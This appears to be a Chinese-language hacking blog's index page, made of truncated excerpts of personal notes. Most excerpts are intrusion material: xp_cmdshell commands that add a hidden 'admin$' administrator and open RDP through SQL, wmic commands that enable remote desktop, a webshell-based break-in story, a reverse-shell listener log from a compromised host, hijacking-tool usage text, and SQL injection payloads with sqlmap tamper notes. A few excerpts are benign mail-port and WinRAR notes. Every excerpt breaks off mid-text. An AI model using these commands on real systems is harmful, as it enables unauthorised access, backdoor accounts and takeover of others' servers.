都是自己常用的 随便发发 auth: 负责处理鉴权证书（绕开鉴权）的脚本 broadcast: 在局域网内探查更多服务开启状况，如dhcp/dns/sqlserver等服务 brute: 提供暴力破解方式，针对常见的应用如http/snmp等 default: 使用-sC或-A选项扫描时候默认的脚本，提供基本脚本扫描能力 discovery: 对网络进行更多的信息，…继续阅读 »

imap.mail.yahoo.com SSL 端口993 smtp.mail.yahoo.com  25

压缩："c:\Program Files\WinRAR\Rar.exe" a -k -r -s -m1 d:\web.rar d:\web\ 解压："c:\Program Files\WinRAR\Rar.exe" x -t -o-p d:\web.rar d:\web\ 带密码压缩:  rar a -r -m5 密码 要保存的文件名 .要压缩的文件名 分卷压缩 10MB： rar a -v10000k d:\m.rar d:\work 

查询 reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" win2008 open3389 wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticat…继续阅读 »

截图不多 我随便说说思路 首先拿到别人给的asp大马和一句话权限各一个 然后测试了一下 不支持php 但是支持aspx 而且非安全模式     权限不高 （不想搞本地提权那些exp 不然就没意思了）   然后随便看了一下systeminfo ipconfig 就不一一截图了   扫了扫端口 没什么收获 …继续阅读 »

1.反弹shell 2.接受反弹的shell 3.执行提权EXP 结束   END   listening on [any] 443... x.x.x.x: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.0.0.10] from (UNKNOWN) [x.x.x.x] 46911: NO_DATA Linux cloud 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86 _64 x86_64 GNU/Linux uid=1000(www) gid=1000(www) groups=1000(www) context=…继续阅读 »

无意中找到了一个Hijack的说明文档 保存一下    usage: hijack <-LVXhefvqsxrkHDtNzoi> <-d dev> <-S interval> <-l logfile> <-W normal|byline|none> <-F jobfile> <-p port> <-c http_flag> <-IO pcap_dump> <-E quit time> <-R reboot time> <-b submask> <-m speed> <Source Host> <Dest Host&g…继续阅读 »

 WIN2000直接建立用户： exec xp_cmdshell 'net user admin$ 199181 /add' exec xp_cmdshell 'net localGroup Administrators admin$ /add' SQL语句开启3389: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; SQL语句关闭3389: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Cont…继续阅读 »

安装idcsystem数据备份  以及恢复方法   下午放出 ps:恢复之前请先备份以前的数据   另外有三个组件是必须下载的 1.sql server 2008 R2 （废话了）               （嘘  不要告诉别人我有官方最快捷的安装方法   url下载地址我会在适当的时候放出  需要可以找我私聊） 2.URL重写组件（又j8废话了…继续阅读 »

sqlmap tamper 脚本整理 可一次使用多个脚本，中间用逗号隔开。 album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM 1,2,3,4,5,6, album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f)# 过滤逗号 apostrophemask.py 用utf8代替引号 Example: ("1 AND '1'='1") '1 …继续阅读 »